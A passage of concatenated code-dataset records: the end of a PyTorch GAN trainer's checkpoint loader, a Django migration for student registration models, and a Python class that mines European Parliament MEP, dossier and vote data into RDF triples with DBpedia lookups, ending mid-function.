self.logger.info(\"Saving current best: model_best.pth ...\")\n\n def _resume_checkpoint(self, resume_path):\n \"\"\"\n Resume from saved checkpoints\n\n :param resume_path: Checkpoint path to be resumed\n \"\"\"\n resume_path = Path(resume_path)\n with open(resume_path / \"checkpoint\", \"r\") as f:\n lines = f.readlines()\n lines = list(map(str.strip, lines))\n if len(lines) != 2:\n self.logger.warning(\"Warning: Checkpoint is empty. Load model weight failed.\")\n return\n resume_pathG, resume_pathD = lines\n\n self.logger.info(\"Loading checkpoint: {} and {} ...\".format(resume_pathG, resume_pathD))\n\n checkpointG = torch.load(resume_pathG)\n checkpointD = torch.load(resume_pathD)\n self.start_epoch = checkpointG['epoch'] + 1\n # self.mnt_best = checkpoint['monitor_best']\n\n # load architecture params from checkpoint.\n if checkpointG['config']['netG'] != self.config['netG'] or checkpointD['config']['netD'] != self.config['netD']:\n self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n \"checkpoint. 
This may yield an exception while state_dict is being loaded.\")\n self.generator.load_state_dict(checkpointG['state_dict'])\n self.discriminator.load_state_dict(checkpointD['state_dict'])\n # load optimizer state from checkpoint only when optimizer type is not changed.\n if checkpointG['config']['optimizerG']['type'] != self.config['optimizerG']['type'] or \\\n checkpointD['config']['optimizerD']['type'] != self.config['optimizerD']['type']:\n self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n \"Optimizer parameters not being resumed.\")\n else:\n self.optimizerG.load_state_dict(checkpointG['optimizer'])\n self.optimizerD.load_state_dict(checkpointD['optimizer'])\n\n self.logger.info(\"Checkpoint loaded. Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"zacharyclam/FusionCGAN","sub_path":"base/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":9412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24354491459","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('staff', '0001_initial'),\n ('ophasebase', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Settings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('student_registration_enabled', models.BooleanField(verbose_name='Klausuranmeldung aktiv', default=False)),\n ],\n options={\n 'verbose_name': 'Einstellungen',\n 'verbose_name_plural': 'Einstellungen',\n },\n ),\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('prename', models.CharField(verbose_name='Vorname', max_length=50)),\n ('name', models.CharField(verbose_name='Name', max_length=50)),\n ('email', models.EmailField(verbose_name='E-Mail-Adresse', max_length=254, blank=True)),\n ('want_exam', models.BooleanField(verbose_name='Klausur mitschreiben?', default=False)),\n ('want_newsletter', models.BooleanField(verbose_name='Newsletter abonnieren?', default=False)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('ophase', models.ForeignKey(to='ophasebase.Ophase', on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Erstie',\n 'verbose_name_plural': 'Ersties',\n 'ordering': ['tutor_group', 'name', 'prename'],\n },\n ),\n migrations.CreateModel(\n name='TutorGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(verbose_name='Gruppenname', max_length=50)),\n ('group_category', models.ForeignKey(verbose_name='Gruppenkategorie', to='staff.GroupCategory', on_delete=models.CASCADE)),\n ('ophase', models.ForeignKey(to='ophasebase.Ophase', on_delete=models.CASCADE)),\n ('tutors', models.ManyToManyField(verbose_name='Tutoren', to='staff.Person')),\n ],\n options={\n 'verbose_name': 'Kleingruppe',\n 'verbose_name_plural': 'Kleingruppen',\n 'ordering': ['group_category', 'name'],\n },\n ),\n migrations.AddField(\n model_name='student',\n name='tutor_group',\n field=models.ForeignKey(verbose_name='Kleingruppe', to='students.TutorGroup', on_delete=models.CASCADE),\n ),\n 
]\n","repo_name":"d120/pyophase","sub_path":"students/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"10324791081","text":"import re\nfrom datetime import datetime\nimport urllib.parse as urlparse\nfrom iribaker import to_iri\nfrom rdflib import URIRef, Literal\nimport logging\nfrom timeit import default_timer as timer\nimport multiprocessing\nimport json\nimport os\nimport spotlight\n\nimport io_handler as io\nimport constants as c\nimport formatting as fmt\nfrom sparql_server import SparqlServer\nfrom dataset_generator import DatasetGenerator\nfrom utils import get_elapsed_seconds\n\n# TODO () Look into addN() function for adding multiple triples in one go\n# https://rdflib.readthedocs.io/en/stable/_modules/rdflib/graph.html#ConjunctiveGraph.addN\n\n\nclass Miner(object):\n \"\"\"Miner module.\"\"\"\n\n def __init__(self, manager, debug=False):\n self.debug = debug\n\n # External URIs (DBPedia etc)\n self.mep_ext_uris = manager.dict()\n self.party_ext_uris = manager.dict()\n self.places_ext_uris = manager.dict()\n self.committees_ext_uris = manager.dict()\n\n # Internal URIs\n self.dict_mep = manager.dict()\n self.dict_parties = manager.dict()\n self.dict_dossier = manager.dict()\n self.dict_committees = manager.dict()\n self.dict_docs = manager.dict()\n\n self.list_activities = manager.list()\n self.list_procedures = manager.list()\n self.list_sub_procedures = manager.list()\n self.list_doc_types = manager.list()\n\n self.sparql_endpoint = SparqlServer(c.SPARQL_ENDPOINT)\n\n self.total_triples = 0\n\n logging.basicConfig(\n filename=c.MAIN_LOG,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n datefmt=\"%d/%m/%Y %I:%M:%S %p\",\n )\n\n def start(self, num_threads, mep_limit, dossier_limit, vote_limit):\n \"\"\"Starts the miner class with the given configuration.\"\"\"\n\n loaded_dict = io.load_json(c.EXTERNAL_MEP_URIS)\n if loaded_dict is not None:\n self.mep_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_PARTY_URIS)\n if loaded_dict is not None:\n self.party_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_PLACES_URIS)\n if loaded_dict is not None:\n self.places_ext_uris.update(loaded_dict)\n\n loaded_dict = io.load_json(c.EXTERNAL_COMMITTEE_URIS)\n if loaded_dict is not None:\n self.committees_ext_uris.update(loaded_dict)\n\n # TEMP\n loaded_dict = io.load_json(c.JSON_DIR + \"subprocedures.json\")\n if loaded_dict is not None:\n self.list_procedures.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"procedures.json\")\n if loaded_dict is not None:\n self.list_procedures.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"activities.json\")\n if loaded_dict is not None:\n self.list_activities.extend(loaded_dict)\n\n loaded_dict = io.load_json(c.JSON_DIR + \"doc_types.json\")\n if loaded_dict is not None:\n self.list_doc_types.extend(loaded_dict)\n\n results = self.convert_meps(c.DIR_MEPS, num_threads, mep_limit)\n if results:\n total_mep_triples, total_meps, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i MEPs (%i triples). 
Took %f seconds\\n\"\n % (total_meps, total_mep_triples, time),\n )\n else:\n return False\n\n io.save_dict_to_json(c.EXTERNAL_MEP_URIS, self.mep_ext_uris)\n io.save_dict_to_json(c.EXTERNAL_PARTY_URIS, self.party_ext_uris)\n io.save_dict_to_json(c.EXTERNAL_COMMITTEE_URIS, self.committees_ext_uris)\n\n results = self.convert_dossiers(c.DIR_DOSSIERS, num_threads, dossier_limit)\n if results:\n total_dossier_triples, total_dossiers, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i dossiers (%i triples). Took %f seconds\\n\"\n % (total_dossiers, total_dossier_triples, time),\n )\n else:\n return False\n\n io.save_dict_to_json(c.EXTERNAL_PLACES_URIS, self.places_ext_uris)\n\n io.save_list_to_json(c.JSON_DIR + \"activities.json\", self.list_activities)\n io.save_list_to_json(c.JSON_DIR + \"procedures.json\", self.list_procedures)\n io.save_list_to_json(c.JSON_DIR + \"subprocedures.json\", self.list_sub_procedures)\n io.save_list_to_json(c.JSON_DIR + \"doc_types.json\", self.list_doc_types)\n\n results = self.convert_votes(c.DIR_VOTES, num_threads, vote_limit)\n if results:\n total_vote_triples, total_votes, time = results\n print(\n fmt.OK_SYMBOL,\n \"Mined %i related votes (%i triples). Took %f seconds\\n\"\n % (total_votes, total_vote_triples, time),\n )\n else:\n return False\n\n self.total_triples = total_mep_triples + total_dossier_triples + total_vote_triples\n\n # def mepid_to_profile_iri(id):\n # return URIRef(to_iri('http://www.europarl.europa.eu/meps/en/' + str(id)\n # + '/_history.html'))\n\n @staticmethod\n def mep_to_lpv(id_):\n id_string = str(id_)\n\n return URIRef(to_iri(c.lp + \"EUmember_\" + id_string))\n\n # Needs changing?\n @staticmethod\n def id_to_iri(id_, prefix=None):\n id_string = str(id_)\n if prefix:\n id_string = prefix + \"_\" + id_string\n\n return URIRef(to_iri(c.ont + id_string))\n\n @staticmethod\n def format_name_string(input_string):\n input_string = re.sub(\"\\(.+?\\)\", \"\", input_string)\n input_string = input_string.lower().title().strip()\n input_string = re.sub(\"\\s+\", \"_\", input_string)\n return str(urlparse.quote_plus(input_string.replace(\".\", \"_\")))\n\n @staticmethod\n def get_dbpedia_lookup_uris(search_string, search_class=None, max_results=5):\n query = (\n \"MaxHits=\" + str(max_results) + \"&QueryString=\" + urlparse.quote_plus(search_string)\n )\n if search_class:\n query += \"&QueryClass=\" + urlparse.quote_plus(search_class)\n\n resp = io.get_request(c.URL_DBPEDIA_LOOKUP + query)\n\n uris = []\n if resp:\n for result in resp[\"results\"]:\n uri = result[\"uri\"]\n if uri not in uris:\n uris.append(uri)\n elif resp is False:\n return False\n\n return uris\n\n @staticmethod\n def get_dbpedia_spotlight_uris(search_string, filters):\n uris = []\n\n try:\n annotations = spotlight.annotate(\n c.URL_DBPEDIA_SPOTLIGHT, search_string, filters=filters\n )\n\n for result in annotations:\n uri = result[\"URI\"]\n if uri not in uris:\n uris.append(uri)\n except spotlight.SpotlightException:\n pass\n\n return uris\n\n @staticmethod\n def fetch_uris_from_name(name, keywords=\"\", search_class=None, max_results=5):\n uris = []\n dbpedia_uris = Miner.get_dbpedia_lookup_uris(\n name + \" \" + keywords, search_class=search_class, max_results=max_results\n )\n\n if dbpedia_uris:\n uris = dbpedia_uris\n elif (\n dbpedia_uris is False\n ): # Failed, but uris might still be available, so don't generate one\n return uris\n else: # Nothing found with spotlight, so just create a uri from the name string\n formatted = Miner.format_name_string(name)\n iri = 
to_iri(c.dbr + formatted)\n            uris.append(iri)\n\n        return uris\n\n    def key_exists(self, key, uri_dict):\n        key = str(key)\n        if key in uri_dict:\n            return True\n        else:\n            return False\n\n    def uris_exist(self, key, uri_dict):\n        key = str(key)\n        if self.key_exists(\n            key, uri_dict\n        ):  # Check if the key exists in the dictionary and has a list\n            if uri_dict[key]:  # Check that the list is not empty\n                return True\n\n        return False\n\n    def add_uris(self, uris, key, uri_dict):\n        key = str(key)\n        if not self.key_exists(key, uri_dict):\n            uri_dict[key] = []\n\n        if type(uris) is not list:  # If it's a single uri (string), convert it to a list anyway\n            uris = [uris]\n\n        \"\"\"\n        for uri in uris:\n            if uri not in uri_dict[key][selected_list]:\n                uri_dict[key][selected_list].append(uri)\n        \"\"\"\n\n        uri_dict[key] = uris\n\n    def get_uris(self, key, uri_dict):\n        key = str(key)\n        if self.uris_exist(key, uri_dict):\n            return uri_dict[key]\n        else:\n            return []\n\n    def process_mep(self, index):\n        triples = set()\n\n        mep = io.load_json(os.path.join(c.DIR_MEPS, str(index) + \".json\"), verbose=False)\n\n        date_now = datetime.now().date()\n\n        # Get raw values\n        mep_id = int(mep[\"UserID\"])\n        # user_id = str(mep['_id'])\n        full_name = Literal(str(mep[\"Name\"][\"full\"].lower().title().strip()), datatype=c.STRING)\n\n        profile_url = Literal(str(mep[\"meta\"][\"url\"]), datatype=c.URI)\n        mep_uri = Miner.id_to_iri(mep_id, prefix=\"mep\")\n\n        triples.add((mep_uri, c.TYPE, c.MEP))\n\n        # If no URIs exist, fetch any existing ones and add them to our dictionary\n        if not self.uris_exist(mep_id, self.mep_ext_uris):\n            mep_ext_uris = Miner.fetch_uris_from_name(\n                full_name, keywords=\"politician\", max_results=1\n            )  # For some reason results are best without search_class='person'\n            self.add_uris(mep_ext_uris, mep_id, self.mep_ext_uris)\n\n        # Add all external URIs as the same individual\n        for ext_uri in self.get_uris(mep_id, self.mep_ext_uris):\n            triples.add((mep_uri, c.SAME_AS, URIRef(ext_uri)))\n\n        # TODO: Make this more integrated\n        triples.add((mep_uri, c.SAME_AS, Miner.mep_to_lpv(mep_id)))\n\n        # append to temp dictionary of processed MEPs\n        self.dict_mep[mep_id] = mep_uri\n\n        if \"Photo\" in mep:\n            photo_url = Literal(str(mep[\"Photo\"]), datatype=c.IMAGE)\n            triples.add((mep_uri, c.THUMBNAIL, photo_url))\n\n        if \"Birth\" in mep:\n            if \"date\" in mep[\"Birth\"]:\n                birth_date = mep[\"Birth\"][\"date\"]\n                if birth_date != \"\":\n                    birth_date = Literal(\n                        datetime.strptime(birth_date.split(\"T\")[0], \"%Y-%m-%d\").date(),\n                        datatype=c.DATE,\n                    )\n                    triples.add((mep_uri, c.BIRTH_DATE, birth_date))\n\n            if \"place\" in mep[\"Birth\"]:\n                birth_place = mep[\"Birth\"][\"place\"].strip().lower()\n\n                # If no URIs exist, fetch any existing ones and add them to our dictionary\n                if not self.uris_exist(birth_place, self.places_ext_uris):\n                    birth_place_uris = Miner.fetch_uris_from_name(\n                        birth_place, search_class=\"place\", max_results=5\n                    )\n                    self.add_uris(birth_place_uris, birth_place, self.places_ext_uris)\n\n                uris = self.get_uris(birth_place, self.places_ext_uris)\n                if uris:\n                    triples.add((mep_uri, c.BIRTH_PLACE, URIRef(uris[0])))\n\n        if \"Death\" in mep:\n            death_date = str(mep[\"Death\"])\n            death_date = Literal(\n                datetime.strptime(death_date.split(\"T\")[0], \"%Y-%m-%d\").date(),\n                datatype=c.DATE,\n            )\n            triples.add((mep_uri, c.DEATH_DATE, death_date))\n\n        # if 'active' in mep: active = mep['active'] # interesting but\n        # unused atm\n\n        # twitter = mep['Twitter']\n\n        if \"Groups\" in mep:\n            for group in mep[\"Groups\"]:\n                party_id = 
group[\"groupid\"]\n party_title = group[\"Organization\"]\n party_uri = self.id_to_iri(party_title)\n\n party_ids = set()\n if type(party_id) is list:\n party_ids.update(party_id)\n # TODO: Link older parties to their newer version with some instance inc date if possible\n party_id = party_id[\n 0\n ] # Select the latest as the main id TODO: Improve/Check this?\n else:\n party_ids.add(party_id)\n\n # Map the ID to the internal URI\n if not self.key_exists(party_id, self.dict_parties):\n self.dict_parties[party_id] = party_uri\n\n # Link external URIs to each party id that does not yet have some\n for id_ in party_ids:\n if not self.uris_exist(id_, self.party_ext_uris):\n party_ext_uris = Miner.fetch_uris_from_name(\n party_title,\n keywords=\"european union parliament\",\n max_results=5,\n )\n self.add_uris(party_ext_uris, id_, self.party_ext_uris)\n\n # Link the internal party URI to all external counterparts\n for ext_uri in self.get_uris(party_id, self.party_ext_uris):\n triples.add((party_uri, c.SAME_AS, URIRef(ext_uri)))\n\n triples.add((party_uri, c.TYPE, c.POLITICAL_GROUP))\n\n start_date = datetime.strptime(group[\"start\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n end_date = datetime.strptime(group[\"end\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n\n membership_uri = self.id_to_iri(\n str(mep_id) + \"_\" + str(party_id) + \"_\" + str(start_date),\n prefix=\"membership\",\n )\n triples.add((membership_uri, c.START_DATE, Literal(start_date, datatype=c.DATE)))\n\n # If end date has passed\n if end_date <= date_now:\n triples.add((membership_uri, c.END_DATE, Literal(end_date, datatype=c.DATE)))\n\n triples.add((mep_uri, c.HAS_MEMBERSHIP, membership_uri))\n triples.add((membership_uri, c.IS_WITHIN, party_uri))\n\n if \"country\" in group:\n country = group[\"country\"].lower()\n\n if not self.uris_exist(country, self.places_ext_uris):\n country_ext_uris = Miner.fetch_uris_from_name(\n country, search_class=\"country\", max_results=1\n )\n self.add_uris(country_ext_uris, country, self.places_ext_uris)\n\n ext_uris = self.get_uris(country, self.places_ext_uris)\n if ext_uris:\n triples.add((membership_uri, c.REPRESENTS_COUNTRY, URIRef(ext_uris[0])))\n\n if \"role\" in group and group[\"role\"]:\n role = str(group[\"role\"])\n\n if role in c.MEMBERSHIPS:\n triples.add((membership_uri, c.TYPE, c.MEMBERSHIPS[role]))\n else:\n logging.error(\"Unknown role: %s\", role)\n else:\n logging.warning(\n \"No role found: MEP:%i start:%s party:%s. Adding as normal member.\",\n mep_id,\n group[\"start\"],\n party_title,\n )\n triples.add((membership_uri, c.TYPE, c.MEMBERSHIPS[\"Member\"]))\n\n triples.add((c.EUROPEAN_PARLIAMENT, c.IN_LEGISLATURE, party_uri))\n\n if \"Committees\" in mep:\n for committee in mep[\"Committees\"]:\n # committee_title = committee['Organization']\n\n if \"committee_id\" in committee and committee[\"committee_id\"]:\n committee_id = committee[\"committee_id\"]\n elif \"abbr\" in committee and committee[\"abbr\"]:\n committee_id = committee[\"abbr\"]\n else:\n logging.warning(\"No committee_id or abbr found. 
Skipping.\")\n continue\n\n committee_uri = self.id_to_iri(committee_id)\n\n triples.add((committee_uri, c.TYPE, c.COMMITTEE))\n\n if not self.key_exists(committee_id, self.dict_committees):\n self.dict_committees[committee_id] = committee_uri\n\n if not self.uris_exist(committee_id, self.committees_ext_uris):\n committee_ext_uris = Miner.fetch_uris_from_name(\n committee_id, keywords=\"european committee\", max_results=1\n )\n self.add_uris(committee_ext_uris, committee_id, self.committees_ext_uris)\n\n ext_uris = self.get_uris(committee_id, self.committees_ext_uris)\n if ext_uris:\n triples.add((committee_uri, c.SAME_AS, URIRef(ext_uris[0])))\n\n if \"role\" in committee and committee[\"role\"]:\n role = committee[\"role\"]\n\n start_date = datetime.strptime(group[\"start\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n end_date = datetime.strptime(group[\"end\"].split(\"T\")[0], \"%Y-%m-%d\").date()\n\n membership_uri = self.id_to_iri(\n str(mep_id) + \"_\" + committee_id + \"_\" + str(start_date),\n prefix=\"membership\",\n )\n\n if role in c.MEMBERSHIPS:\n triples.add((mep_uri, c.HAS_MEMBERSHIP, membership_uri))\n triples.add((membership_uri, c.TYPE, URIRef(c.MEMBERSHIPS[role])))\n else:\n logging.error(\"Unknown role:\", role)\n else:\n logging.warning(\"No role in committee entry of MEP.\")\n\n if \"Gender\" in mep:\n gender = str(mep[\"Gender\"])\n if gender == \"M\":\n triples.add((mep_uri, c.GENDER, c.MALE))\n elif gender == \"F\":\n triples.add((mep_uri, c.GENDER, c.FEMALE))\n else:\n logging.error(\"Unknown gender:\", gender)\n else:\n logging.warning(\"No gender found: %s\" % profile_url)\n\n \"\"\"\n if 'Financial Declarations' in mep:\n declarations = mep['Financial Declarations']\n if declarations:\n print (json.dumps(declarations, indent=2))\n \"\"\"\n\n triples.add((mep_uri, c.FULL_NAME, full_name))\n triples.add((mep_uri, c.URI, profile_url))\n triples.add((mep_uri, c.OFFICE, c.MEMBER_OF_EU))\n\n return triples\n\n def convert_meps(self, path, num_threads, limit):\n start = timer()\n counter = 0\n\n selected_meps = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining MEPs...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n results = pool.map(self.process_mep, selected_meps)\n\n dataset = DatasetGenerator.get_dataset()\n for triples in results:\n for triple in triples:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n counter += 1\n\n if not self.debug:\n # Max 1000 MEPs per request\n if (counter % 1000) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, counter, \"MEPs imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", counter, \"MEPs imported.\")\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n\n return dataset.__len__(), counter, get_elapsed_seconds(start, end)\n\n def process_dossier(self, index):\n triples = set()\n\n dossier = io.load_json(os.path.join(c.DIR_DOSSIERS, str(index) + \".json\"), verbose=False)\n\n # dossier_id = dossier['_id']\n dossier_url = Literal(str(dossier[\"meta\"][\"source\"]), datatype=c.URI)\n procedure = dossier[\"procedure\"]\n\n dossier_reference = procedure[\"reference\"]\n dossier_title = Literal(str(procedure[\"title\"].strip()), datatype=c.STRING)\n # 
dossier_stage = Literal(str(procedure['stage_reached']), datatype=c.STRING)\n dossier_type = procedure[\"type\"]\n\n if self.key_exists(\"subtype\", procedure):\n self.list_sub_procedures.append(procedure[\"subtype\"])\n\n # TEMP\n if dossier_type not in self.list_procedures:\n self.list_procedures.append(dossier_type)\n\n dossier_uri = self.id_to_iri(dossier_reference, prefix=\"dossier\")\n\n # Append to temp dictionary of dossiers processed\n self.dict_dossier[dossier_reference] = dossier_uri\n\n # triples.add((dossier_uri, c.REACHED_STAGE, dossier_stage))\n # triples.add((dossier_uri, c.PROCEDURE_TYPE, dossier_type))\n triples.add((dossier_uri, c.TYPE, c.DOSSIER))\n triples.add((dossier_uri, c.DOSSIER_TITLE, dossier_title))\n triples.add((dossier_uri, c.URI, dossier_url))\n\n if \"geographical_area\" in procedure:\n if procedure[\"geographical_area\"]:\n geo_areas = [geo_area.lower() for geo_area in procedure[\"geographical_area\"]]\n for geo_area in geo_areas:\n if not self.uris_exist(geo_area, self.places_ext_uris):\n geo_ext_uris = Miner.fetch_uris_from_name(\n geo_area, search_class=\"place\", max_results=5\n )\n self.add_uris(geo_ext_uris, geo_area, self.places_ext_uris)\n\n ext_uris = self.get_uris(geo_area, self.places_ext_uris)\n if ext_uris:\n triples.add((dossier_uri, c.GEO_AREA, URIRef(ext_uris[0])))\n\n for activity in dossier[\"activities\"]:\n # TODO: Filter out irelevant activities\n if \"type\" in activity:\n if activity[\"type\"] is not None:\n activity_type = activity[\"type\"].lower()\n activity_id = dossier_reference + \"_\" + activity_type\n activity_uri = self.id_to_iri(activity_id, prefix=\"activity\")\n activity_date = Literal(\n datetime.strptime(activity[\"date\"].split(\"T\")[0], \"%Y-%m-%d\").date(),\n datatype=c.DATE,\n )\n\n # TEMP\n if activity_type not in self.list_activities:\n self.list_activities.append(activity_type)\n\n triples.add(\n (activity_uri, c.TYPE, c.ACTIVITY)\n ) # TODO: Make subclass according to acitvity type\n triples.add((activity_uri, c.DATE, activity_date))\n triples.add((dossier_uri, c.HAS_ACTIVITY, activity_uri))\n\n # if 'meeting_id' in activity:\n # if activity['meeting_id'] != None:\n # activity_id = int(activity['meeting_id'])\n\n if \"body\" in activity:\n if activity[\"body\"]:\n activity_body = str(activity[\"body\"])\n if (\n activity_body != \"unknown\"\n ): # TODO: Investigate why parltrack gives some as unknown\n if activity_body in c.BODIES:\n for body in c.BODIES[activity_body]:\n body_uri = body[c.PREFIX]\n\n if body_uri:\n triples.add((activity_uri, c.HAS_BODY, body_uri))\n triples.add(\n (dossier_uri, c.PROCESSED_BY, body_uri)\n ) # TODO: make this inferred?\n\n dbp_body_uri = body[\"dbpedia\"]\n if dbp_body_uri:\n triples.add(\n (body_uri, c.SAME_AS, dbp_body_uri)\n ) # TODO: check if this causes issues with duplicates\n else:\n logging.error(\"Unknown activity body '%s'\" % activity_body)\n\n if \"title\" in activity:\n activity_title = Literal(str(activity[\"title\"]), datatype=c.STRING)\n triples.add((activity_uri, c.ACTIVITY_TITLE, activity_title))\n\n if \"docs\" in activity:\n for doc in activity[\"docs\"]:\n # TODO: Filter out irelevant docs\n doc_id = doc[\"title\"]\n doc_uri = self.id_to_iri(activity_id + \"_\" + doc_id, prefix=\"document\")\n\n # Save the doc uri mapping if it does not already exist\n if doc_id not in self.dict_docs:\n self.dict_docs[doc_id] = doc_uri\n\n triples.add((activity_uri, c.HAS_DOC, doc_uri))\n triples.add((doc_uri, c.TYPE, c.DOCUMENT))\n triples.add(\n (\n doc_uri,\n 
c.DOCUMENT_TITLE,\n Literal(doc_id, datatype=c.STRING),\n )\n )\n\n if \"url\" in doc:\n if doc[\"url\"]:\n doc_url = Literal(str(doc[\"url\"]), datatype=c.URI)\n triples.add((doc_uri, c.URI, doc_url))\n\n if \"type\" in doc:\n if doc[\"type\"]:\n doc_type = doc[\"type\"].lower()\n triples.add(\n (\n doc_uri,\n c.DOC_TYPE,\n Literal(doc_type, datatype=c.STRING),\n )\n )\n\n # TODO: REMOVE\n if doc_type not in self.list_doc_types:\n self.list_doc_types.append(doc_type)\n else:\n logging.warning(\"Activity has no type:\", json.dumps(activity, indent=2))\n else:\n logging.warning(\"Activity has no type field!\", json.dumps(activity, indent=2))\n\n for committee in dossier[\"committees\"]:\n committee_title = committee[\"committee_full\"]\n committee_id = committee[\"committee\"]\n committee_uri = self.id_to_iri(committee_id, prefix=\"committee\")\n committee_responsible = bool(committee[\"responsible\"])\n\n if self.key_exists(\"body\", committee):\n committee_body = committee[\"body\"]\n if self.key_exists(committee_body, c.BODIES):\n for body in c.BODIES[committee_body]:\n body_uri = body[c.PREFIX]\n if body_uri:\n triples.add((committee_uri, c.HAS_BODY, body_uri))\n dbp_body_uri = body[\"dbpedia\"]\n if dbp_body_uri:\n triples.add((URIRef(body_uri), c.SAME_AS, dbp_body_uri))\n\n if committee_responsible:\n triples.add((committee_uri, c.IS_RESPONSIBLE, dossier_uri))\n else:\n triples.add((committee_uri, c.IS_INVOLVED, dossier_uri))\n\n triples.add(\n (\n committee_uri,\n c.COMMITTEE_TITLE,\n Literal(committee_title, datatype=c.STRING),\n )\n )\n\n # TODO () Figure out ID troubles (ID doesn't match current\n # dictionary)\n \"\"\"\n if 'rapporteur' in committee:\n for rapporteur in committee['rapporteur']:\n committee_rapporteur_id = str(rapporteur['mepref'])\n\n if committee_rapporteur_id in self.mep_ext_uris:\n mep_uri = URIRef(self.mep_ext_uris[committee_rapporteur_id][0])\n triples.add([committee_uri, c.HAS_RAPPORTEUR , mep_uri])\n print (mep_uri)\n else:\n print (\"MEP not found:\", committee_rapporteur_id)\n print (json.dumps(rapporteur, indent=2), \"\\n\")\n \"\"\"\n\n return triples\n\n # TODO: See if there is a better dossier url to use instead of dossier['meta']['source']\n # TODO: See if there is a better dossier text to use instead of\n # dossier['procedure']['title']\n def convert_dossiers(self, path, num_threads, limit):\n start = timer()\n counter = 0\n num_triples = 0\n\n selected_dossiers = io.get_dataset_indexes(path, limit)\n\n print(fmt.WAIT_SYMBOL, \"Mining Dossiers...\")\n\n try:\n pool = multiprocessing.Pool(num_threads)\n results = pool.map(self.process_dossier, selected_dossiers)\n\n dataset = DatasetGenerator.get_dataset()\n for dossier in results:\n for triple in dossier:\n try:\n dataset.add((triple[0], triple[1], triple[2]))\n except AssertionError as e:\n print(e, triple)\n return False\n\n num_triples += len(dossier)\n counter += 1\n\n if not self.debug:\n # Max 1000 dossiers per request\n if (counter % 1000) == 0 and counter != 0:\n # reset dataset\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.INFO_SYMBOL, counter, \"dossiers imported.\")\n dataset = DatasetGenerator.get_dataset()\n\n if not self.debug:\n # Import any left over from the last (incomplete) batch\n if not self.sparql_endpoint.import_dataset(dataset):\n return False\n\n print(fmt.OK_SYMBOL, \"Total of\", counter, \"dossiers imported.\")\n\n finally:\n pool.close()\n pool.join()\n\n end = timer()\n return num_triples, counter, get_elapsed_seconds(start, 
end)\n\n    def process_votes(self, index):\n        count = 0\n        failed = 0\n        triples = set()\n\n        votes = io.load_json(os.path.join(c.DIR_VOTES, str(index) + \".json\"), verbose=False)\n\n        if \"report\" in votes:\n            report_id = votes[\"report\"]\n            # dossier_reference = votes['epref']\n            # vote_id = votes['_id']\n            vote_title = votes[\"title\"]\n            vote_id = Miner.format_name_string(vote_title)\n            vote_uri = self.id_to_iri(vote_id, prefix=\"parlvote\")\n\n            triples.add((vote_uri, c.VOTE_TITLE, Literal(vote_title, datatype=c.STRING)))\n\n            if report_id in self.dict_docs:\n                report_uri = URIRef(self.dict_docs[report_id])\n            else:\n                logging.warning(\n                    \"Did not find a matching report uri in dict_docs. Generating one. (This is really not ideal)\"\n                )\n                report_uri = self.id_to_iri(report_id, prefix=\"document\")\n\n            # triples.add((vote_uri, c.BASED_ON_REPORT, report_uri))\n\n            triples.add((report_uri, c.TYPE, c.REPORT))\n            triples.add((vote_uri, c.IS_VOTE_FOR, report_uri))\n\n            \"\"\"\n            # If there's a dossier id and we processed this dossier, link the voting to the looked up URI, otherwise attempt to construct the URI and hope for the best\n            if 'dossierid' in votes and self.key_exists(str(votes['dossierid']), self.dict_dossier):\n                dossier_uri = self.dict_dossier[str(votes['dossierid'])]\n            else:\n                dossier_uri = self.id_to_iri(dossier_reference, prefix='dossier')\n            \"\"\"\n\n            if \"url\" in votes:\n                vote_url = votes[\"url\"]\n                triples.add((URIRef(vote_uri), c.URI, Literal(vote_url, datatype=c.URI)))\n\n            # title = votes['title']\n            # url = dossier['url']\n            # ep_title = dossier['eptitle']\n\n            for vote_type in c.VOTES:\n                if vote_type in votes:\n                    for group in votes[vote_type][\"groups\"]:\n                        # group_name = group['group']\n                        for vote in group[\"votes\"]:\n                            try:\n                                if \"ep_id\" in vote:\n                                    voter_id 